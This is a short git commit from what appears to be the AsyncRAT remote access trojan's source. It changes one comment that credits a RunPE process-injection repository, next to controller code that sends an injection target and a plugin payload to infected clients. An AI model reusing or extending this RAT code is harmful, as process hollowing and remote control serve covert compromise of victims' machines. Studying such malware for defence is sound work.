Update runPE

This commit is contained in:
NYAN CAT 2019-06-12 09:12:30 +03:00
parent cd19887e85
commit 4c90f1b85b
2 changed files with 1 additions and 1 deletions

View File

@ -499,7 +499,7 @@ namespace AsyncRAT_Sharp
{
msgpack.ForcePathObject("Inject").AsString = formSend.comboBox2.Text;
msgpack.ForcePathObject("Plugin").SetAsBytes(Properties.Resources.Plugin);
// github.com/gigajew/WinXRunPE-x86_x64
// github.com/Artiist/RunPE-Process-Protection
}
foreach (ListViewItem itm in listView1.SelectedItems)